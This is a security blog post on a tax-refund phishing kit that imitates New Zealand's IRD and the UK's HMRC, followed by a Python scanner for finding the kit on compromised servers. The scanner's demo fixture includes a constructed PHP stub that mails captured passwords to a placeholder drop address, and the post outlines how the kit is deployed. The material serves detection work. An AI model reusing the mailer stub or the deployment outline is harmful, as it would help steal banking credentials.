A month ago, the New Zealand Department of Inland Revenue (IRD) issued a warning advising people not to respond to scam emails claiming to offer tax refunds. We have observed these types of scams before, but the individual campaigns come and go. Like any other phishing scam, this email campaign appears to look like a legitimate notification from Inland Revenue complete with the logo.
The link in the message body points to a phony web page that mimics the New Zealand IRD website. But the odd thing is the instruction in a red font stating “Please click on your following bank logo to continue the refund procedure”.
Clicking on any of the bank logos opens a fake login page that requires the user to enter their banking credentials and other personal details.
While digging around the phishing site, we came across a “readme.txt” file. It basically left hints that this phishing page was a kit authored by “MaxDeMon” written specifically to target online banking users of a range of New Zealand banks.
Searching Google for some keywords from the phishing kit shows that the kit is used widely and comes in different variations. Here is a screenshot of a fake “Tax Refund Portal” mimicking the UK’s HM Revenue and Customs webpage, again instructing users to click on their bank logo:
The above suggests the ‘package’ is shared around and used by multiple groups. Anyone using it only needs a PHP web server (preferably, from their point of view, a hacked one) and to configure a PHP file to send the phished banking details to their email address. That’s pretty easy, and probably why this type of phishing scam is persistent.
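For anyone cleaning up a compromised web server, the traces described above (the red “click on your following bank logo” instruction, the readme.txt crediting the kit author, and a PHP script that mails captured form fields) make a usable triage signature. The following Python scanner is an added example, not code from the original post; the lure phrase and readme credit come from the post, while the “credential mailer” heuristic (a .php file that both calls mail() and reads password/PIN/card-style POST fields) and the sample directory it builds are assumptions constructed for the demo.

```python
"""Scan a web root for traces of a bank-logo tax-refund phishing kit.

Added example, not from the original post. Indicators: the lure phrase and the
"MaxDeMon" readme credit are from the post; the mailer heuristic is an assumption.
"""
import re
import tempfile
from pathlib import Path

# Strings the post reports seeing on the phishing pages.
LURE_PHRASE = re.compile(r"click on your following bank logo", re.I)
README_CREDIT = re.compile(r"MaxDeMon", re.I)

# Heuristic (assumption): the kit's exfiltration script is a PHP file that
# calls mail() AND reads credential-looking POST/REQUEST fields.
MAIL_CALL = re.compile(r"\bmail\s*\(", re.I)
CRED_FIELD = re.compile(
    r"\$_(?:POST|REQUEST)\s*\[\s*['\"](?:pass(?:word)?|pin|card|cvv|account)", re.I
)


def scan_webroot(root):
    """Return a list of (relative_path, indicator) tuples for matching files."""
    findings = []
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        rel = path.relative_to(root).as_posix()
        if LURE_PHRASE.search(text):
            findings.append((rel, "bank-logo lure text"))
        if path.name.lower() == "readme.txt" and README_CREDIT.search(text):
            findings.append((rel, "kit readme credit"))
        if path.suffix.lower() == ".php" and MAIL_CALL.search(text) and CRED_FIELD.search(text):
            findings.append((rel, "credential mailer"))
    return findings


def build_sample_webroot():
    """Build a constructed, minimal directory tree imitating the kit layout.

    Everything here is made up for the demo; it is not the real kit.
    """
    root = Path(tempfile.mkdtemp(prefix="kitscan_"))
    kit = root / "refund"
    kit.mkdir()
    (kit / "index.html").write_text(
        "<p style='color:red'>Please click on your following bank logo "
        "to continue the refund procedure</p>\n"
    )
    (kit / "readme.txt").write_text("Kit by MaxDeMon\n")  # constructed credit line
    (kit / "send.php").write_text(  # constructed stand-in for the mailer script
        "<?php\n$msg = 'user=' . $_POST['username'] . ' pass=' . $_POST['password'];\n"
        "mail('DROP@EXAMPLE.INVALID', 'refund', $msg);\n?>\n"
    )
    # Benign controls: a plain page and a legitimate contact form that mails
    # a message but reads no credential-looking field.
    (root / "about.html").write_text("<p>Nothing to see here.</p>\n")
    (root / "contact.php").write_text(
        "<?php mail('info@example.invalid', 'hi', $_POST['message']); ?>\n"
    )
    return root


if __name__ == "__main__":
    demo_root = build_sample_webroot()
    for rel_path, indicator in scan_webroot(demo_root):
        print(f"{indicator:22s} {rel_path}")
```

Run it against a real document root by calling `scan_webroot("/var/www/html")` instead of the constructed tree; the benign contact form in the sample shows why the mailer rule requires a credential-style field and not just a mail() call.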